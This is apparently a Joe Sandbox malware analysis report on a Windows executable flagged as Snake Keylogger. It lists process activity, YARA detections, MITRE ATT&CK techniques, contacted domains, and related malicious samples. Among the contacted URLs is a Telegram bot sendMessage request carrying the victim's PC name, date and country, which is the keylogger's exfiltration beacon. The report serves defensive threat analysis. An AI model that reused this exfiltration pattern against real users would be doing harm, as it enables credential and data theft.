Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Windows\SysWOW64\msiexec.exe VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\4Vx2rUlb0f.exe

Code function: 0_2_00406072 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,

0_2_00406072

Stealing of Sensitive Information

Yara detected Snake Keylogger

Source: Yara match

File source: 00000007.00000002.3052249542.0000000025251000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Yara detected Snake Keylogger

Source: Yara match

File source: 00000007.00000002.3052249542.0000000025251000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Windows Management Instrumentation	1 DLL Side-Loading	1 Access Token Manipulation	11 Masquerading	OS Credential Dumping	11 Security Software Discovery	Remote Services	1 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	2 PowerShell	Boot or Logon Initialization Scripts	311 Process Injection	21 Virtualization/Sandbox Evasion	LSASS Memory	1 Process Discovery	Remote Desktop Protocol	1 Clipboard Data	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	1 Access Token Manipulation	Security Account Manager	21 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	3 Ingress Tool Transfer	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	311 Process Injection	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	2 Obfuscated Files or Information	LSA Secrets	1 System Network Configuration Discovery	SSH	Keylogging	14 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Software Packing	Cached Domain Credentials	2 File and Directory Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	14 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
4Vx2rUlb0f.exe	75%	Virustotal		Browse
4Vx2rUlb0f.exe	65%	ReversingLabs	Win32.Spyware.Snakekeylogger
4Vx2rUlb0f.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\neoimpressionism\Andengenerationsindvandrer\4Vx2rUlb0f.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\nsr8170.tmp\nsExec.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\neoimpressionism\Andengenerationsindvandrer\4Vx2rUlb0f.exe	65%	ReversingLabs	Win32.Spyware.Snakekeylogger

Source	Detection	Scanner	Label	Link
http://www.skinstudio.netG	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
drive.google.com	142.250.185.206	true	false	high
drive.usercontent.google.com	142.250.184.193	true	false	high
reallyfreegeoip.org	104.21.112.1	true	false	high
api.telegram.org	149.154.167.220	true	false	high
checkip.dyndns.com	132.226.247.73	true	false	high
checkip.dyndns.org	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Reputation
https://reallyfreegeoip.org/xml/8.46.123.189	false	high
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:210979%0D%0ADate%20and%20Time:%2011/01/2025%20/%2004:46:37%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20210979%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D	false	high
http://checkip.dyndns.org/	false	high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://nuget.org/NuGet.exe	powershell.exe, 00000001.00000002.2698155602.0000000005E7C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://aka.ms/winsvr-2022-pshelp	powershell.exe, 00000001.00000002.2693602382.0000000004F66000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.telegram.org	msiexec.exe, 00000007.00000002.3052249542.0000000025420000.00000004.00000800.00020000.00000000.sdmp	false		high
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000001.00000002.2693602382.0000000004F66000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.telegram.org/bot	msiexec.exe, 00000007.00000002.3052249542.0000000025420000.00000004.00000800.00020000.00000000.sdmp	false		high
https://translate.google.com/translate_a/element.js	msiexec.exe, 00000007.00000003.2833538108.0000000009632000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2833538108.000000000963D000.00000004.00000020.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/soap/encoding/	powershell.exe, 00000001.00000002.2693602382.0000000004F66000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000001.00000002.2693602382.0000000004F66000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/License	powershell.exe, 00000001.00000002.2698155602.0000000005E7C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/Icon	powershell.exe, 00000001.00000002.2698155602.0000000005E7C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://drive.usercontent.google.com/	msiexec.exe, 00000007.00000002.3037606643.0000000009639000.00000004.00000020.00020000.00000000.sdmp	false		high
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:210979%0D%0ADate%20a	msiexec.exe, 00000007.00000002.3052249542.0000000025420000.00000004.00000800.00020000.00000000.sdmp	false		high
http://checkip.dyndns.org	msiexec.exe, 00000007.00000002.3052249542.000000002534E000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.3052249542.000000002539E000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.3052249542.00000000253BA000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.3052249542.00000000253AC000.00000004.00000800.00020000.00000000.sdmp	false		high
http://nsis.sf.net/NSIS_ErrorError	4Vx2rUlb0f.exe, 00000000.00000000.1784950404.000000000040A000.00000008.00000001.01000000.00000003.sdmp, 4Vx2rUlb0f.exe, 00000000.00000002.1829718865.000000000040A000.00000004.00000001.01000000.00000003.sdmp	false		high
https://api.telegram.org/bot/sendMessage?chat_id=&text=	msiexec.exe, 00000007.00000002.3052249542.0000000025420000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.skinstudio.netG	4Vx2rUlb0f.exe, 00000000.00000002.1829896250.0000000000453000.00000002.00000001.01000000.00000003.sdmp	false	Avira URL Cloud: safe	unknown
https://github.com/Pester/Pester	powershell.exe, 00000001.00000002.2693602382.0000000004F66000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com	msiexec.exe, 00000007.00000002.3037606643.0000000009624000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2833538108.000000000963D000.00000004.00000020.00020000.00000000.sdmp	false		high
https://aka.ms/pscore6lB	powershell.exe, 00000001.00000002.2693602382.0000000004E11000.00000004.00000800.00020000.00000000.sdmp	false		high
https://drive.google.com/	msiexec.exe, 00000007.00000002.3037606643.00000000095CA000.00000004.00000020.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 00000001.00000002.2693602382.0000000004F66000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/	powershell.exe, 00000001.00000002.2698155602.0000000005E7C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://nuget.org/nuget.exe	powershell.exe, 00000001.00000002.2698155602.0000000005E7C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://reallyfreegeoip.org/xml/8.46.123.189$	msiexec.exe, 00000007.00000002.3052249542.000000002534E000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.3052249542.000000002539E000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.3052249542.00000000253BA000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.3052249542.00000000253AC000.00000004.00000800.00020000.00000000.sdmp	false		high
http://reallyfreegeoip.org	msiexec.exe, 00000007.00000002.3052249542.000000002539E000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.3052249542.00000000253BA000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.3052249542.00000000253AC000.00000004.00000800.00020000.00000000.sdmp	false		high
https://reallyfreegeoip.org	msiexec.exe, 00000007.00000002.3052249542.000000002534E000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.3052249542.000000002539E000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.3052249542.00000000253BA000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.3052249542.00000000253AC000.00000004.00000800.00020000.00000000.sdmp	false		high
https://drive.usercontent.google.com/:	msiexec.exe, 00000007.00000002.3037606643.0000000009639000.00000004.00000020.00020000.00000000.sdmp	false		high
https://apis.google.com	msiexec.exe, 00000007.00000002.3037606643.0000000009624000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2833538108.000000000963D000.00000004.00000020.00020000.00000000.sdmp	false		high
http://checkip.dyndns.com	msiexec.exe, 00000007.00000002.3052249542.000000002539E000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.3052249542.00000000253BA000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.3052249542.00000000253AC000.00000004.00000800.00020000.00000000.sdmp	false		high
http://api.telegram.org	msiexec.exe, 00000007.00000002.3052249542.0000000025420000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000001.00000002.2693602382.0000000004E11000.00000004.00000800.00020000.00000000.sdmp	false		high
https://drive.usercontent.google.com/4	msiexec.exe, 00000007.00000002.3037606643.0000000009639000.00000004.00000020.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
149.154.167.220	api.telegram.org	United Kingdom	62041	TELEGRAMRU	false
142.250.185.206	drive.google.com	United States	15169	GOOGLEUS	false
104.21.112.1	reallyfreegeoip.org	United States	13335	CLOUDFLARENETUS	false
142.250.184.193	drive.usercontent.google.com	United States	15169	GOOGLEUS	false
132.226.247.73	checkip.dyndns.com	United States	16989	UTMEMUS	false

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1588252
Start date and time:	2025-01-10 23:08:32 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 50s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	8
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	4Vx2rUlb0f.exe renamed because original name is a hash value
Original Sample Name:	8806ce311854fa80261e855453c07d30b43a24d413c65cdfaae99024408bd6ff.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@6/13@5/5
EGA Information:	Successful, ratio: 33.3%
HCA Information:	Successful, ratio: 95% Number of executed functions: 88 Number of non-executed functions: 31
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 20.109.210.53, 13.107.246.45
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target msiexec.exe, PID 3192 because it is empty
Execution Graph export aborted for target powershell.exe, PID 7576 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
17:09:36	API Interceptor	37x Sleep call for process: powershell.exe modified
17:11:26	API Interceptor	109x Sleep call for process: msiexec.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
149.154.167.220	Yef4EqsQha.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	b5BQbAhwVD.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse
	9Yn5tjyOgT.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse
	6ZoBPR3isG.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse
	JgE2YgxSzB.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	lsc5QN46NH.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	V7OHj6ISEo.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse
	2CQ2zMn0hb.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse
	6mGpn6kupm.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse
	SABXJ1B5c8.exe	Get hash	malicious	MassLogger RAT	Browse
104.21.112.1	9MZZG92yMO.exe	Get hash	malicious	FormBook	Browse	www.buyspeechst.shop/qzi3/
	QUOTATION#070125-ELITE MARINE .exe	Get hash	malicious	FormBook	Browse	www.buyspeechst.shop/w98i/
	wxl1r0lntg.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	838596cm.nyafka.top/lineLongpolllinuxFlowercentraluploads.php
	SH8ZyOWNi2.exe	Get hash	malicious	CMSBrute	Browse	beammp.com/phpmyadmin/
132.226.247.73	9Yn5tjyOgT.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	checkip.dyndns.org/
	6ZoBPR3isG.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	checkip.dyndns.org/
	JgE2YgxSzB.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	upXUt2jZ0S.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	2CQ2zMn0hb.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	checkip.dyndns.org/
	6mGpn6kupm.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	checkip.dyndns.org/
	oEQp0EklDb.exe	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/
	ajRZflJ2ch.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	checkip.dyndns.org/
	19d6P55zd1.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	fGu8xWoMrg.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
checkip.dyndns.com	Yef4EqsQha.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.6.168
	b5BQbAhwVD.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	132.226.8.169
	UF7jzc7ETP.exe	Get hash	malicious	MassLogger RAT	Browse	132.226.8.169
	9Yn5tjyOgT.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	132.226.247.73
	VQsnGWaNi5.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.130.0
	6ZoBPR3isG.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	132.226.247.73
	JgE2YgxSzB.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	lsc5QN46NH.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.130.0
	V7OHj6ISEo.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	132.226.8.169
	upXUt2jZ0S.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
reallyfreegeoip.org	Yef4EqsQha.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.112.1
	b5BQbAhwVD.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.80.1
	UF7jzc7ETP.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.48.1
	9Yn5tjyOgT.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.32.1
	VQsnGWaNi5.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.48.1
	6ZoBPR3isG.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.80.1
	JgE2YgxSzB.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.16.1
	lsc5QN46NH.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.80.1
	V7OHj6ISEo.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.32.1
	upXUt2jZ0S.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.48.1
api.telegram.org	Yef4EqsQha.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	b5BQbAhwVD.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	9Yn5tjyOgT.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	6ZoBPR3isG.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	JgE2YgxSzB.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	lsc5QN46NH.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	V7OHj6ISEo.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	2CQ2zMn0hb.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	6mGpn6kupm.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	SABXJ1B5c8.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TELEGRAMRU	Yef4EqsQha.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	b5BQbAhwVD.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	9Yn5tjyOgT.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	6ZoBPR3isG.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	JgE2YgxSzB.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	lsc5QN46NH.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	V7OHj6ISEo.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	2CQ2zMn0hb.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	6mGpn6kupm.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	SABXJ1B5c8.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220
UTMEMUS	b5BQbAhwVD.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	132.226.8.169
	UF7jzc7ETP.exe	Get hash	malicious	MassLogger RAT	Browse	132.226.8.169
	9Yn5tjyOgT.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	132.226.247.73
	6ZoBPR3isG.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	132.226.247.73
	JgE2YgxSzB.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	V7OHj6ISEo.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	132.226.8.169
	upXUt2jZ0S.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
	2CQ2zMn0hb.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	132.226.247.73
	6mGpn6kupm.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	132.226.247.73
	oEQp0EklDb.exe	Get hash	malicious	MassLogger RAT	Browse	132.226.247.73
CLOUDFLARENETUS	gH3LlhcRzg.exe	Get hash	malicious	FormBook	Browse	104.21.96.1
	Yef4EqsQha.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.112.1
	M7XS5C07kV.exe	Get hash	malicious	FormBook	Browse	172.67.186.192
	b5BQbAhwVD.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.80.1
	UF7jzc7ETP.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.48.1
	9Yn5tjyOgT.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.32.1
	VQsnGWaNi5.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.48.1
	6ZoBPR3isG.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.80.1
	http://@1800-web.com/new/auth/6XEcGVvsnjwXq8bbJloqbuPkeuHjc6rLcgYUe/bGVvbi5ncmF2ZXNAYXRvcy5uZXQ=	Get hash	malicious	Unknown	Browse	104.17.25.14
	JgE2YgxSzB.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.16.1

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
